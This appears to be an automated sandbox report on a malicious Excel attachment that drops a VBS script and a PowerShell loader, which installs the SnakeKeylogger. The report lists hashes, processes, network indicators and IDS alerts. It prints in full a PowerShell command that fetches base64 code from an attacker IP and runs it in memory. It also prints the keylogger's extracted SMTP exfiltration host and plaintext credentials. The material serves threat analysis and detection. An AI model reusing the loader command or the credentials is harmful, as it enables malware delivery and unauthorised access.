Field | Value
---|---
File name | Solicitud de cotizaciòn..xlsx
Full analysis | https://app.any.run/tasks/440d4e74-553a-4531-8451-f7f6bda138f4
Verdict | Malicious activity
Threats | A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.
Analysis date | December 05, 2022, 19:04:52
OS | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags |
Indicators |
MIME | application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info | Microsoft Excel 2007+
MD5 | CD9567E232B722B34985981E32633321
SHA1 | 3B1FDB9DACD8A1F20FDC0F03D2088855924452A7
SHA256 | 7AE8B3795F2EFFF6E153B1290633C327A5D3ADE19F40ECC0A891579ED5587C61
SSDEEP | 24576:Cmv7PSn7ViMIY4oSX6fM1lPH/VE+njnkLQp:CmMVHfSlPHJngEp
Extension | Description | Match (%)
---|---|---
.xlsx | Excel Microsoft Office Open XML Format document | 61.2
.zip | Open Packaging Conventions container | 31.5
.zip | ZIP compressed archive | 7.2
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2424 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.4756.1000
2748 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | | svchost.exe | User: admin; Company: Design Science, Inc.; Integrity Level: MEDIUM; Description: Microsoft Equation Editor; Exit code: 0; Version: 00110900
2324 | C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} | C:\Windows\system32\DllHost.exe | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: COM Surrogate; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3044 | C:\Windows\System32\powercfg.exe -energy -auto | C:\Windows\System32\powercfg.exe | — | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Power Settings Command-Line Tool; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
872 | C:\Windows\system32\svchost.exe -k DcomLaunch | C:\Windows\system32\svchost.exe | | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Host Process for Windows Services; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
1736 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\greeee.vbs" | C:\Windows\SysWOW64\WScript.exe | — | EQNEDT32.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385
2908 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://4.204.233.44/DLL/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.sdkgajsasjkkgjsfddvfsdvn/42.021.871.591//:ptth')) | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.14409.1005 (rs1_srvoob.161208-1155)
764 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft .NET Assembly Registration Utility; Exit code: 4294967295; Version: 4.7.2558.0 built by: NET471REL1
2316 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft .NET Assembly Registration Utility; Version: 4.7.2558.0 built by: NET471REL1
2332 | C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation | C:\Windows\system32\rundll32.exe | — | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows host process (Rundll32); Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)

SnakeKeylogger configuration extracted from process 2316 (RegAsm.exe):

Field | Value
---|---
Protocol | SMTP
Host | keefort.com.ec
Port | 587
Credentials: Username | [email protected]
Credentials: Password | cousinsnake@@
PID | Process | Key | Operation | Name | Value
---|---|---|---|---|---
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems | write | \|k: | 7C6B3A0078090000010000000000000000000000
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1033 | Off
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1041 | Off
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1042 | Off
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1046 | Off
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1036 | Off
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1031 | Off
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1040 | Off
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 1049 | Off
2424 | EXCEL.EXE | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages | write | 3082 | Off
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2424 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRE37C.tmp.cvr | — | — | —
2324 | DllHost.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat | — | — | —
3044 | powercfg.exe | C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-ntkl.etl | — | — | —
496 | svchost.exe | C:\Windows\appcompat\programs\RecentFileCache.bcf | txt | DB919CBFD8209C206725ED7BD8244D8C | 9ACD346C89EBA0B7497A768523DA4C2EC2818E169A460A5DB0742D43A4C51F89
2324 | DllHost.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\V01.log | binary | 5E3C6B74D1FD73C5D74C3871945A55DB | B6CB57DE1A5EBF078CFCD4EBC2630DB260D2F2A377D0AEA280B603DC0E8A8CF9
2976 | mcbuilder.exe | C:\Windows\rescache\wip\Segment0.cmf | binary | 68B35CF25AE98FD9B310DF7132450024 | 62F5CF8173B64216ACF11ACC1F291FCDFBE25FFEBD5B83FDA80DD516D0DDA527
3044 | powercfg.exe | C:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.html | html | 65EDAA311B3506A8F8192A17C2705B0C | 92B325BA150153152DE3F1AC56C2F8E0B57C0656BE429211596360427FB9B52C
2332 | rundll32.exe | C:\System Volume Information\SPP\metadata-2 | — | — | —
2976 | mcbuilder.exe | C:\Windows\rescache\wip\ResCache.hit | binary | 62E6BAB699C953298F691D554E07E1CB | 04CD989148636E47ECFA650ED12EE1DABDFF74BFAD44256C0D103C66DE35646A
2748 | EQNEDT32.EXE | C:\Users\admin\AppData\Roaming\greeee.vbs | text | AB3FE7A67DDD142A9BAA136EF4125704 | 84A64183C0D06A0A6AC7D9B431E843F74BEAC457F5561D12D58B349AE6F9035C
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2908 | powershell.exe | GET | 200 | 195.178.120.24:80 | http://195.178.120.24/nvdsfvddfsjgkkjsasjagkds.txt | unknown | text | 168 Kb | malicious |
2908 | powershell.exe | GET | 200 | 4.204.233.44:80 | http://4.204.233.44/DLL/NoStartUp.ppam | US | text | 12.0 Kb | malicious |
2316 | RegAsm.exe | GET | 200 | 158.101.44.242:80 | http://checkip.dyndns.org/ | US | html | 104 b | shared |
2908 | powershell.exe | GET | 200 | 4.204.233.44:80 | http://4.204.233.44/Rump/Rump.xls | US | text | 53.1 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2748 | EQNEDT32.EXE | 142.250.185.202:443 | firebasestorage.googleapis.com | GOOGLE | US | whitelisted |
2908 | powershell.exe | 195.178.120.24:80 | — | Delis LLC | US | malicious |
2908 | powershell.exe | 4.204.233.44:80 | — | MICROSOFT-CORP-MSN-AS-BLOCK | US | malicious |
2316 | RegAsm.exe | 88.99.90.21:587 | keefort.com.ec | Hetzner Online GmbH | DE | malicious |
2316 | RegAsm.exe | 158.101.44.242:80 | checkip.dyndns.org | ORACLE-BMC-31898 | US | malicious |
Domain | IP | Reputation
---|---|---
firebasestorage.googleapis.com | | whitelisted
checkip.dyndns.org | | shared
keefort.com.ec | | malicious
PID | Process | Class | Message |
---|---|---|---|
2908 | powershell.exe | A Network Trojan was detected | ET TROJAN Powershell commands sent B64 2 |
2908 | powershell.exe | Misc activity | ET POLICY EXE Base64 Encoded potential malware |
2908 | powershell.exe | Potentially Bad Traffic | ET INFO Dotted Quad Host XLS Request |
2908 | powershell.exe | Potentially Bad Traffic | ET INFO Terse Request for .txt - Likely Hostile |
2908 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.dyndns. Domain |
— | — | Misc activity | AV INFO Query to checkip.dyndns. Domain |
2316 | RegAsm.exe | Potential Corporate Privacy Violation | ET POLICY External IP Lookup - checkip.dyndns.org |
2316 | RegAsm.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |